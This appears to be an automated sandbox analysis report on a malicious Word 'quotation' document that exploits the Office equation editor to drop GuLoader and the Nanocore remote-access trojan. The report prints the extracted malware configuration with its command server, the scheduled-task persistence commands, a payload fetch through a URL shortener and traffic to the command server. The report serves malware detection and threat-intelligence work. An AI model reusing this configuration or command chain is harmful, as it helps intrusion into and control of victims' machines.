Play interactive tour

Edit tour

Analysis Report QUOTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.doc

Overview

General Information

Sample Name:	QUOTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.doc
Analysis ID:	358179
MD5:	bc1c94e783483f1c218efb5dcaf5f67e
SHA1:	7747c98d3d2da16f6e8b2fc56bd0e84532e3a543
SHA256:	d1e84cab5bf5eadd159b04374dce5a78a0e93156086475d41ad86665357dfc66
Tags:	doc
Infos:
Most interesting Screenshot:

Detection

Nanocore GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected Nanocore Rat

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Sigma detected: NanoCore

Sigma detected: Scheduled temp file as task from temp location

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected GuLoader

Yara detected Nanocore RAT

C2 URLs / IPs found in malware configuration

Connects to a URL shortener service

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Drops PE files to the user root directory

Hides that the sample has been downloaded from the Internet (zone.identifier)

Hides threads from debuggers

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Sigma detected: Executables Started in Suspicious Folder

Sigma detected: Execution in Non-Executable Folder

Sigma detected: Suspicious Program Location Process Starts

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

Adds / modifies Windows certificates

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops PE files to the user directory

Drops certificate files (DER)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Office Equation Editor has been started

PE file contains strange resources

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w7x64

WINWORD.EXE (PID: 2200 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)

EQNEDT32.EXE (PID: 2308 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

69577.exe (PID: 2680 cmdline: C:\Users\Public\69577.exe MD5: A6AD1C3046A3CF0C6992507F2886AAB3)

RegAsm.exe (PID: 2916 cmdline: C:\Users\Public\69577.exe MD5: 246BB0F8D68A463FD17C235DEB5491C0)

RegAsm.exe (PID: 2488 cmdline: C:\Users\Public\69577.exe MD5: 246BB0F8D68A463FD17C235DEB5491C0)

schtasks.exe (PID: 3060 cmdline: 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp9445.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)

schtasks.exe (PID: 2276 cmdline: 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp80F5.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)

taskeng.exe (PID: 2272 cmdline: taskeng.exe {DA6299CA-95CA-4E9D-8945-2CC05321254C} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1] MD5: 65EA57712340C09B1B0C427B4848AE05)

RegAsm.exe (PID: 1904 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 0 MD5: 246BB0F8D68A463FD17C235DEB5491C0)

smtpsvc.exe (PID: 2348 cmdline: 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0 MD5: 246BB0F8D68A463FD17C235DEB5491C0)

filename1.exe (PID: 1552 cmdline: 'C:\Users\user\subfolder1\filename1.exe' MD5: A6AD1C3046A3CF0C6992507F2886AAB3)

smtpsvc.exe (PID: 2560 cmdline: 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' MD5: 246BB0F8D68A463FD17C235DEB5491C0)

cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "92421eeb-c456-44c2-ab8d-5a66d7e5ab97", "Group": "Company", "Domain1": "194.5.98.202", "Domain2": "", "Port": 4488, "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo />\r\n  <Triggers />\r\n  <Principals>\r\n    <Principal id=\"Author\">\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>4</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Author\">\r\n    <Exec>\r\n      <Command>\"#EXECUTABLEPATH\"</Command>\r\n      <Arguments>$(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000006.00000002.2371344330.0000000000140000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
00000006.00000002.2371344330.0000000000140000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost
00000006.00000002.2371344330.0000000000140000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000006.00000002.2371329317.0000000000130000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
00000006.00000002.2371329317.0000000000130000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
00000006.00000002.2371533870.0000000000282000.00000040.00000001.sdmp	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security
00000006.00000002.2382867266.000000001F3FF000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: RegAsm.exe PID: 2488	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: RegAsm.exe PID: 2488	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security
Process Memory Space: RegAsm.exe PID: 2488	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x65c3a:$a: NanoCore 0x7f73d:$a: NanoCore 0xaf5eb:$a: NanoCore 0xaf618:$a: NanoCore 0xaf671:$a: NanoCore 0xb6e80:$a: NanoCore 0xb6e93:$a: NanoCore 0xb6ec5:$a: NanoCore 0xd01f9:$a: NanoCore 0xdad3e:$a: NanoCore 0xdaddf:$a: NanoCore 0xdae4c:$a: NanoCore 0xdaf0d:$a: NanoCore 0xdbdde:$a: NanoCore 0xdbe31:$a: NanoCore 0xdbe6a:$a: NanoCore 0xdbedd:$a: NanoCore 0x328ffe:$a: NanoCore 0x32909f:$a: NanoCore 0x32910c:$a: NanoCore 0x3291cd:$a: NanoCore
Click to see the 5 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
6.2.RegAsm.exe.130000.1.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
6.2.RegAsm.exe.130000.1.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
6.2.RegAsm.exe.144629.2.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xb184:$x1: NanoCore.ClientPluginHost 0xb1b1:$x2: IClientNetworkHost
6.2.RegAsm.exe.144629.2.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xb184:$x2: NanoCore.ClientPluginHost 0xc25f:$s4: PipeCreated 0xb19e:$s5: IClientLoggingHost
6.2.RegAsm.exe.144629.2.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
6.2.RegAsm.exe.1f41b071.12.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xb184:$x1: NanoCore.ClientPluginHost 0xb1b1:$x2: IClientNetworkHost
6.2.RegAsm.exe.1f41b071.12.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xb184:$x2: NanoCore.ClientPluginHost 0xc25f:$s4: PipeCreated 0xb19e:$s5: IClientLoggingHost
6.2.RegAsm.exe.1f41b071.12.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
6.2.RegAsm.exe.1f416a48.10.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
6.2.RegAsm.exe.1f416a48.10.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
6.2.RegAsm.exe.1f416a48.10.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
6.2.RegAsm.exe.140000.3.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
6.2.RegAsm.exe.140000.3.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
6.2.RegAsm.exe.140000.3.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
6.2.RegAsm.exe.140000.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
6.2.RegAsm.exe.140000.3.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost
6.2.RegAsm.exe.140000.3.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
6.2.RegAsm.exe.1f416a48.10.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
6.2.RegAsm.exe.1f416a48.10.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost
6.2.RegAsm.exe.1f416a48.10.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
6.2.RegAsm.exe.1e3c125c.9.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
6.2.RegAsm.exe.1e3c125c.9.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
6.2.RegAsm.exe.1f4020ad.11.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xb184:$x1: NanoCore.ClientPluginHost 0x24148:$x1: NanoCore.ClientPluginHost 0xb1b1:$x2: IClientNetworkHost 0x24175:$x2: IClientNetworkHost
6.2.RegAsm.exe.1f4020ad.11.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xb184:$x2: NanoCore.ClientPluginHost 0x24148:$x2: NanoCore.ClientPluginHost 0xc25f:$s4: PipeCreated 0x25223:$s4: PipeCreated 0xb19e:$s5: IClientLoggingHost 0x24162:$s5: IClientLoggingHost
6.2.RegAsm.exe.1f4020ad.11.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Click to see the 20 entries

Sigma Overview

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\Users\Public\69577.exe, CommandLine: C:\Users\Public\69577.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\69577.exe, NewProcessName: C:\Users\Public\69577.exe, OriginalFileName: C:\Users\Public\69577.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2308, ProcessCommandLine: C:\Users\Public\69577.exe, ProcessId: 2680

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 67.199.248.10, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2308, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2308, TargetFilename: C:\Users\Public\69577.exe

Sigma detected: NanoCore

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, ProcessId: 2488, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

Sigma detected: Scheduled temp file as task from temp location

Show sources

Source: Process started

Author: Joe Security: Data: Command: 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp9445.tmp', CommandLine: 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp9445.tmp', CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\Public\69577.exe, ParentImage: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, ParentProcessId: 2488, ProcessCommandLine: 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp9445.tmp', ProcessId: 3060

Sigma detected: Executables Started in Suspicious Folder

Show sources

Source: Process started

Sigma detected: Execution in Non-Executable Folder

Show sources

Source: Process started

Sigma detected: Suspicious Program Location Process Starts

Show sources

Source: Process started

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000006.00000002.2382867266.000000001F3FF000.00000004.00000001.sdmp

Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "92421eeb-c456-44c2-ab8d-5a66d7e5ab97", "Group": "Company", "Domain1": "194.5.98.202", "Domain2": "", "Port": 4488, "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n <RegistrationInfo />\r\n <Triggers />\r\n <Principals>\r\n <Principal id=\"Author\">\r\n <LogonType>InteractiveToken</LogonType>\r\n <RunLevel>HighestAvailable</RunLevel>\r\n </Principal>\r\n </Principals>\r\n <Settings>\r\n <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n <AllowHardTerminate>true</AllowHardTerminate>\r\n <StartWhenAvailable>false</StartWhenAvailable>\r\n <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n <IdleSettings>\r\n <StopOnIdleEnd>false</StopOnIdleEnd>\r\n <RestartOnIdle>false</RestartOnIdle>\r\n </IdleSettings>\r\n <AllowStartOnDemand>true</AllowStartOnDemand>\r\n <Enabled>true</Enabled>\r\n <Hidden>false</Hidden>\r\n <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n <WakeToRun>false</WakeToRun>\r\n <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n <Priority>4</Priority>\r\n </Settings>\r\n <Actions Context=\"Author\">\r\n <Exec>\r\n <Command>\"#EXECUTABLEPATH\"</Command>\r\n <Arguments>$(Arg0)</Arguments>\r\n </Exec>\r\n </Actions>\r\n</Task"}

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\wREzo[1].txt	Virustotal: Detection: 42%	Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\wREzo[1].txt	ReversingLabs: Detection: 27%
Source: C:\Users\user\subfolder1\filename1.exe	ReversingLabs: Detection: 27%
Source: C:\Users\Public\69577.exe	ReversingLabs: Detection: 27%

Multi AV Scanner detection for submitted file

Show sources

Source: QUOTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.doc	Virustotal: Detection: 39%			Perma Link
Source: QUOTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.doc	ReversingLabs: Detection: 25%

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000006.00000002.2371344330.0000000000140000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2382867266.000000001F3FF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2488, type: MEMORY
Source: Yara match	File source: 6.2.RegAsm.exe.144629.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegAsm.exe.1f41b071.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegAsm.exe.1f416a48.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegAsm.exe.140000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegAsm.exe.140000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegAsm.exe.1f416a48.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegAsm.exe.1f4020ad.11.raw.unpack, type: UNPACKEDPE

Source: 6.2.RegAsm.exe.140000.3.unpack

Avira: Label: TR/NanoCore.fadte

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\69577.exe

Jump to behavior

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Compliance:

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Show sources

Source:	Binary string: .pdb< source: RegAsm.exe, 00000006.00000002.2383237704.000000002114B000.00000004.00000001.sdmp
Source:	Binary string: ystem.pdb source: RegAsm.exe, 00000006.00000002.2371574970.0000000000576000.00000004.00000040.sdmp
Source:	Binary string: System.pdbSystem.pdbpdbtem.pdbm\2.0.0.0__b77a5c561934e089\System.pdb9FFP source: RegAsm.exe, 00000006.00000002.2383237704.000000002114B000.00000004.00000001.sdmp
Source:	Binary string: !symbols\dll\System.pdb source: RegAsm.exe, 00000006.00000002.2383237704.000000002114B000.00000004.00000001.sdmp
Source:	Binary string: System.pdb H~t source: RegAsm.exe, 00000006.00000002.2383237704.000000002114B000.00000004.00000001.sdmp
Source:	Binary string: nWindows\System.pdbpdbtem.pdb source: RegAsm.exe, 00000006.00000002.2371574970.0000000000576000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.pdb source: RegAsm.exe, 00000006.00000002.2371574970.0000000000576000.00000004.00000040.sdmp
Source:	Binary string: WT3UpC:\Windows\System.pdb source: RegAsm.exe, 00000006.00000002.2383237704.000000002114B000.00000004.00000001.sdmp
Source:	Binary string: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.pdb source: RegAsm.exe, 00000006.00000002.2371574970.0000000000576000.00000004.00000040.sdmp
Source:	Binary string: < indows\RegAsm.pdbpdbAsm.pdb source: RegAsm.exe, 00000006.00000002.2371574970.0000000000576000.00000004.00000040.sdmp
Source:	Binary string: < indows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb\cs source: RegAsm.exe, 00000006.00000002.2371574970.0000000000576000.00000004.00000040.sdmp
Source:	Binary string: RegAsm.pdb source: smtpsvc.exe, smtpsvc.exe.6.dr
Source:	Binary string: !C:\Windows\System.pdb@= source: RegAsm.exe, 00000006.00000002.2383237704.000000002114B000.00000004.00000001.sdmp
Source:	Binary string: Wm.pdb source: RegAsm.exe, 00000006.00000002.2383056342.00000000203CD000.00000004.00000001.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.pdb source: RegAsm.exe, 00000006.00000002.2371574970.0000000000576000.00000004.00000040.sdmp
Source:	Binary string: System.pdb source: RegAsm.exe, 00000006.00000002.2383237704.000000002114B000.00000004.00000001.sdmp
Source:	Binary string: System.pdb8 source: RegAsm.exe, 00000006.00000002.2371574970.0000000000576000.00000004.00000040.sdmp
Source:	Binary string: mscorrc.pdb source: RegAsm.exe, 00000006.00000002.2371259124.00000000000D0000.00000002.00000001.sdmp
Source:	Binary string: C:\Windows\System.pdb source: RegAsm.exe, 00000006.00000002.2371574970.0000000000576000.00000004.00000040.sdmp

Spreading:

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Windows\Microsoft.NET\Framework\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\6f4f738362752c5d3a2c9234d604784d\System.Drawing.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Windows\Microsoft.NET\	Jump to behavior

Software Vulnerabilities:

Source: global traffic

DNS query: name: bit.ly

Source: global traffic

TCP traffic: 192.168.2.22:49166 -> 5.79.72.163:443

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 67.199.248.10:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49171 -> 194.5.98.202:4488
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49172 -> 194.5.98.202:4488
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49173 -> 194.5.98.202:4488
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49174 -> 194.5.98.202:4488
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49175 -> 194.5.98.202:4488

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	URLs:
Source: Malware configuration extractor	URLs: 194.5.98.202

Connects to a URL shortener service

Show sources

Source: unknown	DNS query: name: bit.ly
Source: unknown	DNS query: name: bit.ly

Source: global traffic

TCP traffic: 192.168.2.22:49171 -> 194.5.98.202:4488

Source: Joe Sandbox View

IP Address: 67.199.248.10 67.199.248.10

Source: Joe Sandbox View	ASN Name: GOOGLE-PRIVATE-CLOUDUS GOOGLE-PRIVATE-CLOUDUS
Source: Joe Sandbox View	ASN Name: DANILENKODE DANILENKODE

Source: global traffic

HTTP traffic detected: GET /2ZKf4aq HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: bit.lyConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.202
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.202
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.202
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.202
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.202
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.202
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.202
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.202
Source: unknown	TCP traffic detected without corresponding DNS query: 194.5.98.202
